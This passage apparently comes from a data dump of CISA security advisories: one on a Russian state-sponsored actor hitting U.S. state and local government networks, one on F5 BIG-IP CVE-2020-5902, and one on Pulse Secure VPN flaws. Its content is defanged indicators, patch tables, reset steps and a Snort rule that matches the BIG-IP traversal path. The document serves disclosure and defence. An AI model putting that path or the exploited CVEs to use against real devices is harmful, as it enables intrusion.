at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.\n\n * Click here for a PDF version of this report.\n * Click here for a STIX package of IOCs.\n\n#### U.S. Heat Map of Activity\n\n[Click here](<https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769>) for an interactive heat map of this activity (current as of November 17, 2020). Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.\n\n**Note**: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email [info@us-cert.gov](<mailto:%20info@us-cert.gov>). To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.\n\n**Note**: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.\n\n### Technical Details\n\nThe FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses `213.74.101[.]65`, `213.74.139[.]196`, and `212.252.30[.]170` to connect to victim web servers (_Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).\n\nThe actor is using `213.74.101[.]65` and `213.74.139[.]196` to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (_Brute Force_ [[T1110](<https://attack.mitre.org/versions/v7/techniques/T1110>)]; _Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]). The APT actor also hosted malicious domains, including possible aviation sector target `columbusairports.microsoftonline[.]host`, which resolved to `108.177.235[.]92` and `[cityname].westus2.cloudapp.azure.com`; these domains are U.S. registered and are likely SLTT government targets (_Drive-By Compromise _[[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]).\n\nThe APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) and a Microsoft Exchange remote code execution flaw ([CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)).\n\nThe APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability ([CVE 2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>)) (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133>)]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability ([CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)) for Initial Access [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] and a Windows Netlogon vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)] within the network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]). These vulnerabilities can also be leveraged to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]) and to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)]).\n\nBetween early February and mid-September, these APT actors used `213.74.101[.]65`, `212.252.30[.]170`, `5.196.167[.]184`, `37.139.7[.]16`, `149.56.20[.]55`, `91.227.68[.]97`, and `5.45.119[.]124` to target U.S. SLTT government networks. Successful authentications\u2014including the compromise of Microsoft Office 365 (O365) accounts\u2014have been observed on at least one victim network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]).\n\n### Mitigations\n\n#### Indicators of Compromise\n\nThe APT actor used the following IP addresses and domains to carry out its objectives:\n\n * `213.74.101[.]65`\n * `213.74.139[.]196`\n * `212.252.30[.]170`\n * `5.196.167[.]184`\n * `37.139.7[.]16`\n * `149.56.20[.]55`\n * `91.227.68[.]97`\n * `138.201.186[.]43`\n * `5.45.119[.]124`\n * `193.37.212[.]43`\n * `146.0.77[.]60`\n * `51.159.28[.]101`\n * `columbusairports.microsoftonline[.]host`\n * `microsoftonline[.]host`\n * `email.microsoftonline[.]services`\n * `microsoftonline[.]services`\n * `cityname[.]westus2.cloudapp.azure.com`\n\nIP address `51.159.28[.]101` appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address `51.159.28[.]101` (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).\n\nOrganizations should check available logs for traffic to/from IP address `51.159.28[.]101` for indications of credential-harvesting activity. As the APT actors likely have\u2014or will\u2014establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.\n\nRefer to AA20-296A.stix for a downloadable copy of IOCs.\n\n#### Network Defense-in-Depth\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.\n\n * Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n\n| [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) | \n\n * Exim versions 4.87\u20134.91\n| [Exim page for CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n[Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n * Follow Microsoft\u2019s [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.\n * If appropriate for your organization\u2019s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on [SMB Security Best Practices](<https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>) for more information.\n * Implement the prevention, detection, and mitigation strategies outlined in: \n * CISA Alert [TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n * National Security Agency Cybersecurity Information Sheet [U/OO/134094-20 \u2013 Detect and Prevent Web Shells Malware](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/>).\n * Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.\n * Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.\n * Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `WINDOWS` folders. All other locations should be disallowed unless an exception is granted.\n * Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.\n\n#### Comprehensive Account Resets\n\nFor accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT \u201cGolden Tickets\u201d may be required, and Microsoft has released specialized [guidance](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts>) for this. Such a reset should be performed very carefully if needed.\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise\u2014as well as in Azure-hosted\u2014AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket `(krbtgt`) password;[[1](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)] this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the` krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n#### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates.\n * **Implement MFA on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor **network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement** MFA, especially for privileged accounts.\n * **Use** separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### Resources\n\n * APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations \u2013 <https://us-cert.cisa.gov/ncas/alerts/aa20-283a>\n * CISA Activity Alert CVE-2019-19781 \u2013 <https://us-cert/cisa.gov/ncas/alerts/aa20-031a>\n * CISA Vulnerability Bulletin \u2013 <https://us-cert/cisa.gov/ncas/bulletins/SB19-161>\n * CISA Current Activity \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>\n * Citrix Directory Traversal Bug (CVE-2019-19781) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * Microsoft Exchange remote code execution flaw (CVE-2020-0688) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-0688>\n * CVE-2018-13379 \u2013 [https://nvd.nist.gov/vuln/detail/CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379%20>)\n * CVE-2020-1472 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-1472>\n * CVE 2019-10149 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-10149>\n * NCCIC/USCERT Alert TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance \u2013 [https://us-cert.cisa.gov/ncas/alerts/TA15-314A](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A%20>)\n * NCCIC/US-CERT publication on SMB Security Best Practices \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices> \n\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version|November 17, 2020: Added U.S. Heat Map of Activity|December 1, 2020: Added \"current as of\" date to U.S. Heat Map of Activity\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-12-01T12:00:00", "id": "AA20-296A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:35:51", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this alert in response to recently disclosed exploits that target F5 BIG-IP devices that are vulnerable to CVE-2020-5902. F5 Networks, Inc. (F5) released a patch for CVE-2020-5902 on June 30, 2020.[[1]](<https://support.f5.com/csp/article/K52145254>) Unpatched F5 BIG-IP devices are an attractive target for malicious actors. Affected organizations that have not applied the patch to fix this critical remote code execution (RCE) vulnerability risk an attacker exploiting CVE-2020-5902 to take control of their system. **Note:** F5\u2019s security advisory for CVE-2020-5902 states that there is a high probability that any remaining unpatched devices are likely already compromised.\n\nCISA expects to see continued attacks exploiting unpatched F5 BIG-IP devices and strongly urges users and administrators to upgrade their software to the fixed versions. CISA also advises that administrators deploy the signature included in this Alert to help them determine whether their systems have been compromised.\n\nThis Alert also provides additional detection measures and mitigations for victim organizations to help recover from attacks resulting from CVE-2020-5902. CISA encourages administrators to remain aware of the ramifications of exploitation and to use the recommendations in this alert to help secure their organization\u2019s systems against attack.\n\n### Background\n\nCISA has conducted incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2020-5902\u2014an RCE vulnerability in the BIG-IP Traffic Management User Interface (TMUI)\u2014to take control of victim systems. On June 30, F5 disclosed CVE-2020-5902, stating that it allows attackers to, \u201cexecute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\u201d\n\nOn July 4, open-source reporting indicated a proof-of-concept code was available and threat actors were exploiting the vulnerability by attempting to steal credentials. On July 5, security researchers posted exploits that would allow threat actors to exfiltrate data or execute commands on vulnerable devices. The risk posed by the vulnerability is critical.\n\n### Technical Details\n\nCISA has observed scanning and reconnaissance, as well as confirmed compromises, within a few days of F5\u2019s patch release for this vulnerability. As early as July 6, 2020, CISA has seen broad scanning activity for the presence of this vulnerability across federal departments and agencies\u2014this activity is currently occurring as of the publication of this Alert.\n\nCISA has been working with several entities across multiple sectors to investigate potential compromises relating to this vulnerability. CISA has confirmed two compromises and is continuing to investigate. CISA will update this Alert with any additional actionable information.\n\n### Detection Methods\n\nCISA recommends administrators see the F5 Security Advisory K52145254 for indicators of compromise and F5\u2019s CVE-2020-5902 IoC Detection Tool.[[2]](<https://support.f5.com/csp/article/K52145254>) CISA also recommends organizations complete the following actions in conducting their hunt for this exploit:\n\n * Quarantine or take offline potentially affected systems\n * Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections\n * Deploy the following CISA-created Snort signature to detect malicious activity: \n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"BIG-IP:HTTP URI GET contains '/tmui/login.jsp/..|3b|/tmui/':CVE-2020-5902\"; sid:1; rev:1; flow:established,to_server; content:\"/tmui/login.jsp/..|3b|/tmui/\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; priority:2; reference:url,github.com/yassineaboukir/CVE-2020-5902; reference:cve,2020-5902; metadata:service http;)`\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their BIG-IP software to the corresponding patches for CVE-2020-5902. If organizations detect evidence of CVE-2020-5902 exploitation after patching and applying the detection measures in this alert, CISA recommends taking immediate action to reconstitute affected systems.\n\nShould an organization\u2019s IT security personnel discover system compromise, CISA recommends they:\n\n * Reimage compromised hosts\n * Provision new account credentials\n * Limit access to the management interface to the fullest extent possible\n * Implement network segmentation \n * **Note: **network segmentation is a very effective security mechanism to help prevent an intruder from propagating exploits or laterally moving within an internal network. Segregation separates network segments based on role and functionality. A securely segregated network can limit the spread of malicious occurrences, reducing the impact from intruders that gain a foothold somewhere inside the network.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" )\n\n### References\n\n[[1] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[[2] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[CISA Factsheet: Guidance for F5 BIG-IP TMUI Vulnerability (CVE-2020-5902)](<https://www.cisa.gov/publication/guidance-f5-big-ip-vulnerability-fact-sheet>)\n\n### Revisions\n\nJuly 24, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T12:00:00", "type": "ics", "title": "Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-07-24T12:00:00", "id": "AA20-206A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:50:23", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. [[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/ >) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications >) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne.\n * July 31, 2019 \u2013 Full use of exploit demonstrated using the admin session hash to get complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", 